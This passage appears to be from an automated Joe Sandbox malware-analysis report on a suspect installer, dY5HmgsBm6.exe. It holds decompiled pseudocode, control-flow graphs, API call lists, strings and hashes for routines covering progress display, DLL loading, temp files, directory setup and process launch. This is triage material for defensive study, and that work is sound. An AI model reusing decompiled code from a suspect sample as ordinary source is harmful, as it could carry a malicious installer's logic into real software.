                                                        							_t26 = lstrcatA(0x42a070, _a8);
                                                        							goto L6;
                                                        						}
                                                        					}
                                                        				}
                                                        				return _t26;
                                                        			}

















                                                        0x00405224
                                                        0x00405230
                                                        0x00405233
                                                        0x00405239
                                                        0x00405245
                                                        0x00405248
                                                        0x0040524b
                                                        0x00405251
                                                        0x00405251
                                                        0x00405257
                                                        0x0040525f
                                                        0x00405262
                                                        0x0040527f
                                                        0x00405283
                                                        0x0040528c
                                                        0x0040528c
                                                        0x00405296
                                                        0x0040529f
                                                        0x004052ab
                                                        0x004052b2
                                                        0x004052b6
                                                        0x004052b9
                                                        0x004052cc
                                                        0x004052da
                                                        0x004052da
                                                        0x004052de
                                                        0x004052e0
                                                        0x004052e3
                                                        0x00000000
                                                        0x004052e3
                                                        0x00405264
                                                        0x0040526c
                                                        0x00405274
                                                        0x0040527a
                                                        0x00000000
                                                        0x0040527a
                                                        0x00405274
                                                        0x00405262
                                                        0x004052ed

                                                        APIs
                                                        • lstrlenA.KERNEL32(Completed,00000000,00427A9C,747DEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                        • lstrlenA.KERNEL32(00403233,Completed,00000000,00427A9C,747DEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                        • lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00427A9C,747DEA30), ref: 0040527A
                                                        • SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Completed
                                                        • API String ID: 2531174081-3087654605
                                                        • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                        • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                        • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                        • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 572 406492-4064b2 GetSystemDirectoryA 573 4064b4 572->573 574 4064b6-4064b8 572->574 573->574 575 4064c8-4064ca 574->575 576 4064ba-4064c2 574->576 578 4064cb-4064fd wsprintfA LoadLibraryExA 575->578 576->575 577 4064c4-4064c6 576->577 577->578
                                                        C-Code - Quality: 100%
                                                        			E00406492(intOrPtr _a4) {
                                                        				char _v292;
                                                        				int _t10;
                                                        				struct HINSTANCE__* _t14;
                                                        				void* _t16;
                                                        				void* _t21;
                                                        
                                                        				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                        				if(_t10 > 0x104) {
                                                        					_t10 = 0;
                                                        				}
                                                        				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                        					_t16 = 1;
                                                        				} else {
                                                        					_t16 = 0;
                                                        				}
                                                        				_t5 = _t16 + 0x40a014; // 0x5c
                                                        				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                        				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                        				return _t14;
                                                        			}








                                                        0x004064a9
                                                        0x004064b2
                                                        0x004064b4
                                                        0x004064b4
                                                        0x004064b8
                                                        0x004064ca
                                                        0x004064c4
                                                        0x004064c4
                                                        0x004064c4
                                                        0x004064ce
                                                        0x004064e2
                                                        0x004064f6
                                                        0x004064fd

                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                        • wsprintfA.USER32 ref: 004064E2
                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%s.dll$UXTHEME$\
                                                        • API String ID: 2200240437-4240819195
                                                        • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                        • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                        • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                        • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 579 4030d8-4030ec 580 4030f5-4030fe 579->580 581 4030ee 579->581 582 403100 580->582 583 403107-40310c 580->583 581->580 582->583 584 40311c-403129 call 4032ea 583->584 585 40310e-403117 call 403300 583->585 589 4032d8 584->589 590 40312f-403133 584->590 585->584 591 4032da-4032db 589->591 592 403283-403285 590->592 593 403139-403182 GetTickCount 590->593 596 4032e3-4032e7 591->596 594 4032c5-4032c8 592->594 595 403287-40328a 592->595 597 4032e0 593->597 598 403188-403190 593->598 599 4032ca 594->599 600 4032cd-4032d6 call 4032ea 594->600 595->597 601 40328c 595->601 597->596 602 403192 598->602 603 403195-4031a3 call 4032ea 598->603 599->600 600->589 613 4032dd 600->613 606 40328f-403295 601->606 602->603 603->589 612 4031a9-4031b2 603->612 609 403297 606->609 610 403299-4032a7 call 4032ea 606->610 609->610 610->589 616 4032a9-4032b5 call 405d37 610->616 615 4031b8-4031d8 call 406625 612->615 613->597 621 40327b-40327d 615->621 622 4031de-4031f1 GetTickCount 615->622 623 4032b7-4032c1 616->623 624 40327f-403281 616->624 621->591 625 4031f3-4031fb 622->625 626 403236-403238 622->626 623->606 627 4032c3 623->627 624->591 628 403203-40322e MulDiv wsprintfA call 40521e 625->628 629 4031fd-403201 625->629 630 40323a-40323e 626->630 631 40326f-403273 626->631 627->597 638 403233 628->638 629->626 629->628 634 403240-403247 call 405d37 630->634 635 403255-403260 630->635 631->598 632 403279 631->632 632->597 639 40324c-40324e 634->639 637 403263-403267 635->637 637->615 640 40326d 637->640 638->626 639->624 641 403250-403253 639->641 640->597 641->637
                                                        C-Code - Quality: 95%
                                                        			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                        				signed int _v8;
                                                        				int _v12;
                                                        				intOrPtr _v16;
                                                        				long _v20;
                                                        				intOrPtr _v24;
                                                        				char _v88;
                                                        				void* _t65;
                                                        				long _t70;
                                                        				intOrPtr _t75;
                                                        				long _t76;
                                                        				intOrPtr _t77;
                                                        				void* _t78;
                                                        				int _t88;
                                                        				intOrPtr _t92;
                                                        				intOrPtr _t95;
                                                        				long _t96;
                                                        				signed int _t97;
                                                        				int _t98;
                                                        				int _t99;
                                                        				intOrPtr _t100;
                                                        				void* _t101;
                                                        				void* _t102;
                                                        
                                                        				_t97 = _a16;
                                                        				_t92 = _a12;
                                                        				_v12 = _t97;
                                                        				if(_t92 == 0) {
                                                        					_v12 = 0x8000;
                                                        				}
                                                        				_v8 = _v8 & 0x00000000;
                                                        				_v16 = _t92;
                                                        				if(_t92 == 0) {
                                                        					_v16 = 0x421448;
                                                        				}
                                                        				_t62 = _a4;
                                                        				if(_a4 >= 0) {
                                                        					E00403300( *0x42f498 + _t62);
                                                        				}
                                                        				if(E004032EA( &_a16, 4) == 0) {
                                                        					L41:
                                                        					_push(0xfffffffd);
                                                        					goto L42;
                                                        				} else {
                                                        					if((_a19 & 0x00000080) == 0) {
                                                        						if(_t92 != 0) {
                                                        							if(_a16 < _t97) {
                                                        								_t97 = _a16;
                                                        							}
                                                        							if(E004032EA(_t92, _t97) != 0) {
                                                        								_v8 = _t97;
                                                        								L44:
                                                        								return _v8;
                                                        							} else {
                                                        								goto L41;
                                                        							}
                                                        						}
                                                        						if(_a16 <= _t92) {
                                                        							goto L44;
                                                        						}
                                                        						_t88 = _v12;
                                                        						while(1) {
                                                        							_t98 = _a16;
                                                        							if(_a16 >= _t88) {
                                                        								_t98 = _t88;
                                                        							}
                                                        							if(E004032EA(0x41d448, _t98) == 0) {
                                                        								goto L41;
                                                        							}
                                                        							if(E00405D37(_a8, 0x41d448, _t98) == 0) {
                                                        								L28:
                                                        								_push(0xfffffffe);
                                                        								L42:
                                                        								_pop(_t65);
                                                        								return _t65;
                                                        							}
                                                        							_v8 = _v8 + _t98;
                                                        							_a16 = _a16 - _t98;
                                                        							if(_a16 > 0) {
                                                        								continue;
                                                        							}
                                                        							goto L44;
                                                        						}
                                                        						goto L41;
                                                        					}
                                                        					_t70 = GetTickCount();
                                                        					 *0x40bdac =  *0x40bdac & 0x00000000;
                                                        					 *0x40bda8 =  *0x40bda8 & 0x00000000;
                                                        					_t14 =  &_a16;
                                                        					 *_t14 = _a16 & 0x7fffffff;
                                                        					_v20 = _t70;
                                                        					 *0x40b890 = 8;
                                                        					 *0x415438 = 0x40d430;
                                                        					 *0x415434 = 0x40d430;
                                                        					 *0x415430 = 0x415430;
                                                        					_a4 = _a16;
                                                        					if( *_t14 <= 0) {
                                                        						goto L44;
                                                        					} else {
                                                        						goto L9;
                                                        					}
                                                        					while(1) {
                                                        						L9:
                                                        						_t99 = 0x4000;
                                                        						if(_a16 < 0x4000) {
                                                        							_t99 = _a16;
                                                        						}
                                                        						if(E004032EA(0x41d448, _t99) == 0) {
                                                        							goto L41;
                                                        						}
                                                        						_a16 = _a16 - _t99;
                                                        						 *0x40b880 = 0x41d448;
                                                        						 *0x40b884 = _t99;
                                                        						while(1) {
                                                        							_t95 = _v16;
                                                        							 *0x40b888 = _t95;
                                                        							 *0x40b88c = _v12;
                                                        							_t75 = E00406625(0x40b880);
                                                        							_v24 = _t75;
                                                        							if(_t75 < 0) {
                                                        								break;
                                                        							}
                                                        							_t100 =  *0x40b888; // 0x427a9c
                                                        							_t101 = _t100 - _t95;
                                                        							_t76 = GetTickCount();
                                                        							_t96 = _t76;
                                                        							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                        								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                        								_t102 = _t102 + 0xc;
                                                        								E0040521E(0,  &_v88); // executed
                                                        								_v20 = _t96;
                                                        							}
                                                        							if(_t101 == 0) {
                                                        								if(_a16 > 0) {
                                                        									goto L9;
                                                        								}
                                                        								goto L44;
                                                        							} else {
                                                        								if(_a12 != 0) {
                                                        									_t77 =  *0x40b888; // 0x427a9c
                                                        									_v8 = _v8 + _t101;
                                                        									_v12 = _v12 - _t101;
                                                        									_v16 = _t77;
                                                        									L23:
                                                        									if(_v24 != 1) {
                                                        										continue;
                                                        									}
                                                        									goto L44;
                                                        								}
                                                        								_t78 = E00405D37(_a8, _v16, _t101); // executed
                                                        								if(_t78 == 0) {
                                                        									goto L28;
                                                        								}
                                                        								_v8 = _v8 + _t101;
                                                        								goto L23;
                                                        							}
                                                        						}
                                                        						_push(0xfffffffc);
                                                        						goto L42;
                                                        					}
                                                        					goto L41;
                                                        				}
                                                        			}

























                                                        0x004030e0
                                                        0x004030e4
                                                        0x004030e7
                                                        0x004030ec
                                                        0x004030ee
                                                        0x004030ee
                                                        0x004030f5
                                                        0x004030f9
                                                        0x004030fe
                                                        0x00403100
                                                        0x00403100
                                                        0x00403107
                                                        0x0040310c
                                                        0x00403117
                                                        0x00403117
                                                        0x00403129
                                                        0x004032d8
                                                        0x004032d8
                                                        0x00000000
                                                        0x0040312f
                                                        0x00403133
                                                        0x00403285
                                                        0x004032c8
                                                        0x004032ca
                                                        0x004032ca
                                                        0x004032d6
                                                        0x004032dd
                                                        0x004032e0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004032d6
                                                        0x0040328a
                                                        0x00000000
                                                        0x00000000
                                                        0x0040328c
                                                        0x0040328f
                                                        0x00403292
                                                        0x00403295
                                                        0x00403297
                                                        0x00403297
                                                        0x004032a7
                                                        0x00000000
                                                        0x00000000
                                                        0x004032b5
                                                        0x0040327f
                                                        0x0040327f
                                                        0x004032da
                                                        0x004032da
                                                        0x00000000
                                                        0x004032da
                                                        0x004032b7
                                                        0x004032ba
                                                        0x004032c1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004032c3
                                                        0x00000000
                                                        0x0040328f
                                                        0x0040313f
                                                        0x00403141
                                                        0x00403148
                                                        0x0040314f
                                                        0x0040314f
                                                        0x00403156
                                                        0x0040315e
                                                        0x00403168
                                                        0x0040316d
                                                        0x00403175
                                                        0x0040317f
                                                        0x00403182
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403188
                                                        0x00403188
                                                        0x00403188
                                                        0x00403190
                                                        0x00403192
                                                        0x00403192
                                                        0x004031a3
                                                        0x00000000
                                                        0x00000000
                                                        0x004031a9
                                                        0x004031ac
                                                        0x004031b2
                                                        0x004031b8
                                                        0x004031b8
                                                        0x004031c3
                                                        0x004031c9
                                                        0x004031ce
                                                        0x004031d5
                                                        0x004031d8
                                                        0x00000000
                                                        0x00000000
                                                        0x004031de
                                                        0x004031e4
                                                        0x004031e6
                                                        0x004031ef
                                                        0x004031f1
                                                        0x0040321f
                                                        0x00403225
                                                        0x0040322e
                                                        0x00403233
                                                        0x00403233
                                                        0x00403238
                                                        0x00403273
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040323a
                                                        0x0040323e
                                                        0x00403255
                                                        0x0040325a
                                                        0x0040325d
                                                        0x00403260
                                                        0x00403263
                                                        0x00403267
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040326d
                                                        0x00403247
                                                        0x0040324e
                                                        0x00000000
                                                        0x00000000
                                                        0x00403250
                                                        0x00000000
                                                        0x00403250
                                                        0x00403238
                                                        0x0040327b
                                                        0x00000000
                                                        0x0040327b
                                                        0x00000000
                                                        0x00403188

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 551687249-2449383134
                                                        • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                        • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                        • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                        • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 642 405cbf-405cc9 643 405cca-405cf5 GetTickCount GetTempFileNameA 642->643 644 405d04-405d06 643->644 645 405cf7-405cf9 643->645 647 405cfe-405d01 644->647 645->643 646 405cfb 645->646 646->647
                                                        C-Code - Quality: 100%
                                                        			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                        				char _t11;
                                                        				signed int _t12;
                                                        				int _t15;
                                                        				signed int _t17;
                                                        				void* _t20;
                                                        				CHAR* _t21;
                                                        
                                                        				_t21 = _a4;
                                                        				_t20 = 0x64;
                                                        				while(1) {
                                                        					_t11 =  *0x40a3d4; // 0x61736e
                                                        					_t20 = _t20 - 1;
                                                        					_a4 = _t11;
                                                        					_t12 = GetTickCount();
                                                        					_t17 = 0x1a;
                                                        					_a6 = _a6 + _t12 % _t17;
                                                        					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                        					if(_t15 != 0) {
                                                        						break;
                                                        					}
                                                        					if(_t20 != 0) {
                                                        						continue;
                                                        					}
                                                        					 *_t21 =  *_t21 & 0x00000000;
                                                        					return _t15;
                                                        				}
                                                        				return _t21;
                                                        			}









                                                        0x00405cc3
                                                        0x00405cc9
                                                        0x00405cca
                                                        0x00405cca
                                                        0x00405ccf
                                                        0x00405cd0
                                                        0x00405cd3
                                                        0x00405cdd
                                                        0x00405cea
                                                        0x00405ced
                                                        0x00405cf5
                                                        0x00000000
                                                        0x00000000
                                                        0x00405cf9
                                                        0x00000000
                                                        0x00000000
                                                        0x00405cfb
                                                        0x00000000
                                                        0x00405cfb
                                                        0x00000000

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405CD3
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                        • nsa, xrefs: 00405CCA
                                                        • "C:\Users\user\Desktop\dY5HmgsBm6.exe" , xrefs: 00405CBF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\dY5HmgsBm6.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-3612807059
                                                        • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                        • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                        • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                        • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 648 4015bb-4015ce call 402bce call 405b28 653 4015d0-4015e3 call 405aba 648->653 654 401624-401627 648->654 661 4015e5-4015e8 653->661 662 4015fb-4015fc call 405761 653->662 656 401652-4022e2 call 401423 654->656 657 401629-401644 call 401423 call 4060f7 SetCurrentDirectoryA 654->657 672 402a5a-402a69 656->672 657->672 674 40164a-40164d 657->674 661->662 665 4015ea-4015f1 call 40577e 661->665 671 401601-401603 662->671 665->662 678 4015f3-4015f9 call 4056e4 665->678 676 401605-40160a 671->676 677 40161a-401622 671->677 674->672 680 401617 676->680 681 40160c-401615 GetFileAttributesA 676->681 677->653 677->654 678->671 680->677 681->677 681->680
                                                        C-Code - Quality: 87%
                                                        			E004015BB(char __ebx, void* __eflags) {
                                                        				void* _t13;
                                                        				int _t19;
                                                        				char _t21;
                                                        				void* _t22;
                                                        				char _t23;
                                                        				signed char _t24;
                                                        				char _t26;
                                                        				CHAR* _t28;
                                                        				char* _t32;
                                                        				void* _t33;
                                                        
                                                        				_t26 = __ebx;
                                                        				_t28 = E00402BCE(0xfffffff0);
                                                        				_t13 = E00405B28(_t28);
                                                        				_t30 = _t13;
                                                        				if(_t13 != __ebx) {
                                                        					do {
                                                        						_t32 = E00405ABA(_t30, 0x5c);
                                                        						_t21 =  *_t32;
                                                        						 *_t32 = _t26;
                                                        						 *((char*)(_t33 + 0xb)) = _t21;
                                                        						if(_t21 != _t26) {
                                                        							L5:
                                                        							_t22 = E00405761(_t28);
                                                        						} else {
                                                        							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                        							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
                                                        								goto L5;
                                                        							} else {
                                                        								_t22 = E004056E4(_t28);
                                                        							}
                                                        						}
                                                        						if(_t22 != _t26) {
                                                        							if(_t22 != 0xb7) {
                                                        								L9:
                                                        								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                        							} else {
                                                        								_t24 = GetFileAttributesA(_t28); // executed
                                                        								if((_t24 & 0x00000010) == 0) {
                                                        									goto L9;
                                                        								}
                                                        							}
                                                        						}
                                                        						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                        						 *_t32 = _t23;
                                                        						_t30 = _t32 + 1;
                                                        					} while (_t23 != _t26);
                                                        				}
                                                        				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                        					_push(0xfffffff5);
                                                        					E00401423();
                                                        				} else {
                                                        					E00401423(0xffffffe6);
                                                        					E004060F7("C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel", _t28);
                                                        					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                        					if(_t19 == 0) {
                                                        						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                        					}
                                                        				}
                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
                                                        				return 0;
                                                        			}













                                                        0x004015bb
                                                        0x004015c2
                                                        0x004015c5
                                                        0x004015ca
                                                        0x004015ce
                                                        0x004015d0
                                                        0x004015d8
                                                        0x004015da
                                                        0x004015dc
                                                        0x004015e0
                                                        0x004015e3
                                                        0x004015fb
                                                        0x004015fc
                                                        0x004015e5
                                                        0x004015e5
                                                        0x004015e8
                                                        0x00000000
                                                        0x004015f3
                                                        0x004015f4
                                                        0x004015f4
                                                        0x004015e8
                                                        0x00401603
                                                        0x0040160a
                                                        0x00401617
                                                        0x00401617
                                                        0x0040160c
                                                        0x0040160d
                                                        0x00401615
                                                        0x00000000
                                                        0x00000000
                                                        0x00401615
                                                        0x0040160a
                                                        0x0040161a
                                                        0x0040161d
                                                        0x0040161f
                                                        0x00401620
                                                        0x004015d0
                                                        0x00401627
                                                        0x00401652
                                                        0x004022dd
                                                        0x00401629
                                                        0x0040162b
                                                        0x00401636
                                                        0x0040163c
                                                        0x00401644
                                                        0x0040164a
                                                        0x0040164a
                                                        0x00401644
                                                        0x00402a5d
                                                        0x00402a69

                                                        APIs
                                                          • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,747DFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                          • Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\CachemanControlPanel,00000000,00000000,000000F0), ref: 0040163C
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\CachemanControlPanel, xrefs: 00401631
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Roaming\CachemanControlPanel
                                                        • API String ID: 1892508949-2369850399
                                                        • Opcode ID: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                        • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                        • Opcode Fuzzy Hash: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                        • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 684 405796-4057c7 CreateProcessA 685 4057d5-4057d6 684->685 686 4057c9-4057d2 CloseHandle 684->686 686->685
                                                        C-Code - Quality: 100%
                                                        			E00405796(CHAR* _a4) {
                                                        				struct _PROCESS_INFORMATION _v20;
                                                        				int _t7;
                                                        
                                                        				0x42c098->cb = 0x44;
                                                        				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20); // executed
                                                        				if(_t7 != 0) {
                                                        					CloseHandle(_v20.hThread);
                                                        					return _v20.hProcess;
                                                        				}
                                                        				return _t7;
                                                        			}





                                                        0x0040579f
                                                        0x004057bf
                                                        0x004057c7
                                                        0x004057cc
                                                        0x00000000
                                                        0x004057d2
                                                        0x004057d6

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                        • CloseHandle.KERNEL32(?), ref: 004057CC
                                                        Strings
                                                        • Error launching installer, xrefs: 004057A9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
